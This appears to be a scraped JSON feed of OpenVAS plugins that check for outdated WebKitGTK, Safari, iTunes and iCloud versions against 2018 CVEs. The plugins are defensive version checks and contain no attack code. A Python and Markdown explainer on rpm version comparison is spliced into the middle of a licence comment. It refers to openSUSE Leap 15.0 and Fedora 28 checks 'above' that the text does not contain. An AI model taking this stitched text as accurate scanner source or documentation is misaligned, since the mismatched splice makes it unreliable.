Vulnerability Test\n# $Id: gb_fedora_2018_aac3ca8936_webkitgtk4_fc27.nasl 14223 2019-03-15 13:49:35Z cfischer $\n#\n# Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.874747\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-29 10:56:18 +0200 (Fri, 29 Jun 2018)\");\n script_cve_id(\"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\",\n \"CVE-2018-4232\", \"CVE-2018-4233\", \"CVE-2018-4246\", \"CVE-2018-11646\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Fedora Update for webkitgtk4 FEDORA-2018-aac3ca8936\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkitgtk4'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present\non the target host.\");\n script_tag(name:\"affected\", value:\"webkitgtk4 on Fedora 27\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"FEDORA\", value:\"2018-aac3ca8936\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/Q6P4J4BQM66DFTDUIWVOVRVIB2AYST56\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n 
script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC27\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC27\")\n{\n\n if ((res = isrpmvuln(pkg:\"webkitgtk4\", rpm:\"webkitgtk4~2.20.3~1.fc27\", rls:\"FC27\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:33:23", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4199", "CVE-2018-4190", "CVE-2018-12293", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4218", "CVE-2018-4232"], "description": "The remote host is missing an update for the ", "modified": "2019-03-13T00:00:00", "published": "2018-06-19T00:00:00", "id": "OPENVAS:1361412562310843564", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310843564", "type": "openvas", "title": "Ubuntu Update for webkit2gtk USN-3687-1", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n# $Id: gb_ubuntu_USN_3687_1.nasl 14140 2019-03-13 12:26:09Z cfischer $\n#\n# Ubuntu Update for webkit2gtk USN-3687-1\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
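The openSUSE and Fedora checks above all reduce to one decision: is the installed build of each listed RPM older than the fixed build (2.20.3-lp150.2.3.1 on Leap 15.0, 2.20.3-1.fc28 on Fedora 28)? The `isrpmvuln()` helper does that with rpm's own version ordering, which is where hand-rolled checks usually go wrong: segments compare numerically, not lexically (2.20.10 is newer than 2.20.9), a `~` in a version marks a pre-release that sorts before the bare version, and an epoch outranks everything after the colon. The block below is an added example, not Greenbone's `pkg-lib-rpm.inc` nor Tenable's plugin code; its `rpmvercmp()` follows the segment rules of rpm's `lib/rpmvercmp.c`. It assumes the fixed builds carry epoch 0 (the `name~version~release` strings above give none), that `%{EPOCHNUM}` is the rpm query tag that prints the epoch as a number, and the `rpm -qa` output it checks is constructed for the example.

```python
# Added example: the version gate behind the isrpmvuln() calls above, written
# from rpm's lib/rpmvercmp.c rules; it is not Greenbone's or Tenable's code.

def rpmvercmp(a: str, b: str) -> int:
    """-1/0/1 like rpm's rpmvercmp(): walk alternating numeric and alphabetic
    segments and ignore separators. '~' sorts before anything, even end of
    string (2.20.3~rc1 < 2.20.3); '^' sorts after end of string only."""
    if a == b:
        return 0
    i = j = 0
    while i < len(a) or j < len(b):
        while i < len(a) and not (a[i].isalnum() or a[i] in "~^"):
            i += 1
        while j < len(b) and not (b[j].isalnum() or b[j] in "~^"):
            j += 1
        ca = a[i] if i < len(a) else ""
        cb = b[j] if j < len(b) else ""
        if ca == "~" or cb == "~":
            if ca != "~" or cb != "~":
                return 1 if ca != "~" else -1
            i, j = i + 1, j + 1
            continue
        if ca == "^" or cb == "^":
            if not ca or not cb:              # the bare base version is older
                return -1 if not ca else 1
            if ca != "^" or cb != "^":
                return 1 if ca != "^" else -1
            i, j = i + 1, j + 1
            continue
        if not ca or not cb:                  # one side ran out of segments
            break
        isnum = ca.isdigit()
        kind = str.isdigit if isnum else str.isalpha
        sa, sb = i, j
        while i < len(a) and kind(a[i]):
            i += 1
        while j < len(b) and kind(b[j]):
            j += 1
        seg_a, seg_b = a[sa:i], b[sb:j]
        if not seg_b:                         # numeric segment beats alphabetic
            return 1 if isnum else -1
        if isnum:
            seg_a, seg_b = seg_a.lstrip("0"), seg_b.lstrip("0")
            if len(seg_a) != len(seg_b):      # more digits means larger number
                return 1 if len(seg_a) > len(seg_b) else -1
        if seg_a != seg_b:
            return 1 if seg_a > seg_b else -1
    if i >= len(a) and j >= len(b):
        return 0
    return -1 if i >= len(a) else 1

def parse_evr(evr: str):
    """Split 'epoch:version-release'; a missing epoch counts as 0, as in rpm."""
    epoch, sep, rest = evr.partition(":")
    if not sep:
        epoch, rest = "0", evr
    version, sep, release = rest.rpartition("-")
    if not sep:
        version, release = rest, ""
    return epoch, version, release

def evr_compare(x: str, y: str) -> int:
    """Epoch outranks version, version outranks release, as in rpm."""
    for a, b in zip(parse_evr(x), parse_evr(y)):
        r = rpmvercmp(a, b)
        if r:
            return r
    return 0

# Fixed builds spelled as the isrpmvuln() calls above spell them
# (name~version~release, no epoch, so epoch 0 is assumed here).
FIXED = {
    "openSUSELeap15.0": [
        "libwebkit2gtk-4_0-37~2.20.3~lp150.2.3.1",
        "typelib-1_0-WebKit2-4_0~2.20.3~lp150.2.3.1",
        "webkit2gtk3-devel~2.20.3~lp150.2.3.1",
    ],
    "FC28": ["webkit2gtk3~2.20.3~1.fc28"],
}

def vulnerable_packages(release: str, rpm_qa_output: str):
    """rpm_qa_output holds 'NAME EPOCH:VERSION-RELEASE' lines, e.g. from
    rpm -qa --qf '%{NAME} %{EPOCHNUM}:%{VERSION}-%{RELEASE}\\n' (tags assumed).
    Returns [(name, installed_evr, fixed_evr)]; absent packages are not reported."""
    installed = dict(line.split() for line in rpm_qa_output.splitlines() if line.strip())
    hits = []
    for spec in FIXED.get(release, []):
        name, version, rel = spec.split("~")  # NASL separator, not a version tilde
        fixed = f"0:{version}-{rel}"
        if name in installed and evr_compare(installed[name], fixed) < 0:
            hits.append((name, installed[name], fixed))
    return hits

# Constructed rpm -qa output for a Leap 15.0 host (version strings invented):
# WebKit2 one build behind the fix, the devel package on a tilde pre-release,
# and a typelib whose epoch bump outranks its older-looking version.
SAMPLE_LEAP = """\
libwebkit2gtk-4_0-37 0:2.20.2-lp150.1.2
webkit2gtk3-devel 0:2.20.3~rc1-lp150.2.3.1
typelib-1_0-WebKit2-4_0 1:2.19.0-lp150.1.1
"""
```

`vulnerable_packages("openSUSELeap15.0", SAMPLE_LEAP)` reports the WebKit2 library and the tilde pre-release of the devel package, and nothing for the typelib: its epoch is 1, so rpm considers 1:2.19.0 newer than 0:2.20.3, which is exactly the case a naive string or float comparison gets backwards. Like the NASL scripts, the function stays silent for packages that are not installed at all, so a host without webkit2gtk3 produces no finding rather than a false one.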
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.843564\");\n script_version(\"$Revision: 14140 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-13 13:26:09 +0100 (Wed, 13 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2018-06-19 06:01:01 +0200 (Tue, 19 Jun 2018)\");\n script_cve_id(\"CVE-2018-12293\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4218\", \"CVE-2018-4222\", \"CVE-2018-4232\", \"CVE-2018-4233\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_name(\"Ubuntu Update for webkit2gtk USN-3687-1\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'webkit2gtk'\n package(s) announced via the referenced advisory.\");\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n script_tag(name:\"insight\", value:\"A large number of security issues were discovered in the WebKitGTK+ Web and\nJavaScript engines. 
If a user were tricked into viewing a malicious\nwebsite, a remote attacker could exploit a variety of issues related to web\nbrowser security, including cross-site scripting attacks, denial of service\nattacks, and arbitrary code execution.\");\n script_tag(name:\"affected\", value:\"webkit2gtk on Ubuntu 18.04 LTS,\n Ubuntu 17.10,\n Ubuntu 16.04 LTS\");\n script_tag(name:\"solution\", value:\"Please install the updated packages.\");\n\n script_xref(name:\"USN\", value:\"3687-1\");\n script_xref(name:\"URL\", value:\"http://www.ubuntu.com/usn/usn-3687-1/\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"Ubuntu Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/ubuntu_linux\", \"ssh/login/packages\", re:\"ssh/login/release=UBUNTU(17\\.10|18\\.04 LTS|16\\.04 LTS)\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nrelease = dpkg_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"UBUNTU17.10\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.17.10.1\", rls:\"UBUNTU17.10\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}\n\n\nif(release == \"UBUNTU18.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.18.04.1\", rls:\"UBUNTU18.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n 
exit(0);\n}\n\n\nif(release == \"UBUNTU16.04 LTS\")\n{\n\n if ((res = isdpkgvuln(pkg:\"libjavascriptcoregtk-4.0-18\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isdpkgvuln(pkg:\"libwebkit2gtk-4.0-37\", ver:\"2.20.3-0ubuntu0.16.04.1\", rls:\"UBUNTU16.04 LTS\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-03-03T19:44:58", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4188", "CVE-2018-4205", "CVE-2018-4199", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4247", "CVE-2018-4232"], "description": "This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.", "modified": "2020-02-28T00:00:00", "published": "2018-06-04T00:00:00", "id": "OPENVAS:1361412562310813509", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813509", "type": "openvas", "title": "Apple Safari Security Updates(HT208854)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple Safari Security Updates(HT208854)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:safari\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813509\");\n script_version(\"2020-02-28T13:41:47+0000\");\n script_cve_id(\"CVE-2018-4247\", \"CVE-2018-4205\", \"CVE-2018-4232\", \"CVE-2018-4246\",\n \"CVE-2018-4192\", \"CVE-2018-4188\", \"CVE-2018-4214\", \"CVE-2018-4201\",\n \"CVE-2018-4218\", \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\",\n \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2020-02-28 13:41:47 +0000 (Fri, 28 Feb 2020)\");\n script_tag(name:\"creation_date\", value:\"2018-06-04 13:35:10 +0530 (Mon, 04 Jun 2018)\");\n script_name(\"Apple Safari Security Updates(HT208854)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple Safari\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - A permissions issue in the handling of web browser cookies.\n\n - A type confusion issue in memory handling.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A buffer overflow issue in memory handling.\n\n - Credentials were unexpectedly sent when fetching CSS mask images.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation of will allow remote\n attackers to cause a denial of service, conduct spoofing 
attack, overwrite\n cookies, execute arbitrary code, crash Safari and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple Safari versions before 11.1.1.\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple Safari 11.1.1 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"executable_version\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208854\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"macosx_safari_detect.nasl\");\n script_mandatory_keys(\"AppleSafari/MacOSX/Version\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE))\n exit(0);\n\nvers = infos[\"version\"];\npath = infos[\"location\"];\n\nif(version_is_less(version:vers, test_version:\"11.1.1\")) {\n report = report_fixed_ver(installed_version:vers, fixed_version:\"11.1.1\", install_path:path);\n security_message(port:0, data:report);\n exit(0);\n}\n\nexit(99);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:16", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "This host is installed with Apple iTunes\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-06T00:00:00", "id": "OPENVAS:1361412562310813513", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813513", "type": "openvas", "title": "Apple iTunes Security Updates(HT208852)", 
"sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iTunes Security Updates(HT208852)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:itunes\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813513\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4188\", \"CVE-2018-4201\", \"CVE-2018-4218\",\n \"CVE-2018-4233\", \"CVE-2018-4199\", \"CVE-2018-4190\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:01:42 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iTunes Security Updates(HT208852)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple 
iTunes\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"Multiple flaws exists due to,\n\n - An authorization issue in state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - An inconsistent user interface issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iTunes versions before 12.7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iTunes 12.7.5 or later. 
Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208852\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"secpod_apple_itunes_detection_win_900123.nasl\");\n script_mandatory_keys(\"iTunes/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nituneVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:ituneVer, test_version:\"12.7.5\"))\n{\n report = report_fixed_ver(installed_version:ituneVer, fixed_version:\"12.7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-07-17T14:04:19", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4225", "CVE-2018-4188", "CVE-2018-4199", "CVE-2018-4224", "CVE-2018-4190", "CVE-2018-4233", "CVE-2018-4222", "CVE-2018-4192", "CVE-2018-4204", "CVE-2018-4201", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4214", "CVE-2018-4232", "CVE-2018-4200", "CVE-2018-4226"], "description": "This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.", "modified": "2019-07-05T00:00:00", "published": "2018-06-06T00:00:00", "id": "OPENVAS:1361412562310813514", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310813514", "type": "openvas", "title": "Apple iCloud Security Updates(HT208853)", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Apple iCloud Security Updates(HT208853)\n#\n# Authors:\n# Rajat Mishra <rajatm@secpod.com>\n#\n# Copyright:\n# Copyright (C) 2018 Greenbone 
Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nCPE = \"cpe:/a:apple:icloud\";\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.813514\");\n script_version(\"2019-07-05T09:12:25+0000\");\n script_cve_id(\"CVE-2018-4224\", \"CVE-2018-4225\", \"CVE-2018-4226\", \"CVE-2018-4232\",\n \"CVE-2018-4192\", \"CVE-2018-4214\", \"CVE-2018-4204\", \"CVE-2018-4246\",\n \"CVE-2018-4200\", \"CVE-2018-4201\", \"CVE-2018-4218\", \"CVE-2018-4233\",\n \"CVE-2018-4188\", \"CVE-2018-4190\", \"CVE-2018-4199\", \"CVE-2018-4222\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_tag(name:\"last_modification\", value:\"2019-07-05 09:12:25 +0000 (Fri, 05 Jul 2019)\");\n script_tag(name:\"creation_date\", value:\"2018-06-06 11:24:10 +0530 (Wed, 06 Jun 2018)\");\n script_name(\"Apple iCloud Security Updates(HT208853)\");\n\n script_tag(name:\"summary\", value:\"This host is installed with Apple iCloud\n and is prone to multiple vulnerabilities.\");\n\n script_tag(name:\"vuldetect\", value:\"Checks if a vulnerable version is present on the target host.\");\n\n script_tag(name:\"insight\", value:\"The multiple flaws exists due to,\n\n - An authorization issue in 
state management.\n\n - A permissions issue in the handling of web browser cookies.\n\n - A race condition issue in locking.\n\n - A memory corruption issue in input validation.\n\n - A type confusion issue in memory handling.\n\n - A memory corruption issue in state management.\n\n - Multiple memory corruption issues in memory handling.\n\n - An inconsistent user interface issue in state management.\n\n - A buffer overflow issue in memory handling.\n\n - An out-of-bounds read issue in input validation.\");\n\n script_tag(name:\"impact\", value:\"Successful exploitation will allow an\n attacker to read a persistent device identifier, modify the state of the\n Keychain, view sensitive user information, overwrite cookies, execute arbitrary\n code, crash Safari, spoof address bar and leak sensitive data.\");\n\n script_tag(name:\"affected\", value:\"Apple iCloud versions before 7.5\");\n\n script_tag(name:\"solution\", value:\"Upgrade to Apple iCloud 7.5 or later. Please see the references for more information.\");\n\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_tag(name:\"qod_type\", value:\"registry\");\n script_xref(name:\"URL\", value:\"https://support.apple.com/en-us/HT208853\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2018 Greenbone Networks GmbH\");\n script_family(\"General\");\n script_dependencies(\"gb_apple_icloud_detect_win.nasl\");\n script_mandatory_keys(\"apple/icloud/Win/Ver\");\n exit(0);\n}\n\ninclude(\"version_func.inc\");\ninclude(\"host_details.inc\");\n\nif(!infos = get_app_version_and_location(cpe:CPE, exit_no_version:TRUE)) exit(0);\nicVer = infos['version'];\niPath = infos['location'];\n\nif(version_is_less(version:icVer, test_version:\"7.5\"))\n{\n report = report_fixed_ver(installed_version:icVer, fixed_version:\"7.5\", install_path:iPath);\n security_message(data:report);\n exit(0);\n}\nexit(0);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": 
"2020-01-31T17:39:17", "bulletinFamily": "scanner", "cvelist": ["CVE-2018-4119", "CVE-2017-7161", "CVE-2018-4129", "CVE-2018-4165", "CVE-2018-4146", "CVE-2017-7165", "CVE-2018-4101", "CVE-2018-4128", "CVE-2018-4199", "CVE-2018-4163", "CVE-2018-12911", "CVE-2018-4120", "CVE-2018-4118", "CVE-2018-4114", "CVE-2018-4190", "CVE-2018-11646", "CVE-2018-11713", "CVE-2018-11712", "CVE-2018-4133", "CVE-2018-4162", "CVE-2017-7153", "CVE-2018-4125", "CVE-2017-7160", "CVE-2018-4233", "CVE-2018-4113", "CVE-2018-4222", "CVE-2017-13884", "CVE-2018-4127", "CVE-2018-4088", "CVE-2018-4204", "CVE-2018-4096", "CVE-2018-4218", "CVE-2018-4246", "CVE-2018-4117", "CVE-2018-4161", "CVE-2017-13885", "CVE-2018-4232", "CVE-2018-4122", "CVE-2018-4200", "CVE-2018-4121"], "description": "The remote host is missing an update for the ", "modified": "2020-01-31T00:00:00", "published": "2018-10-26T00:00:00", "id": "OPENVAS:1361412562310852089", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310852089", "type": "openvas", "title": "openSUSE: Security Advisory for webkit2gtk3 (openSUSE-SU-2018:3473-1)", "sourceData": "# Copyright (C) 2018 Greenbone Networks GmbH\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (C) of their respective author(s)\n#\n# SPDX-License-Identifier: GPL-2.0-or-later\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. 
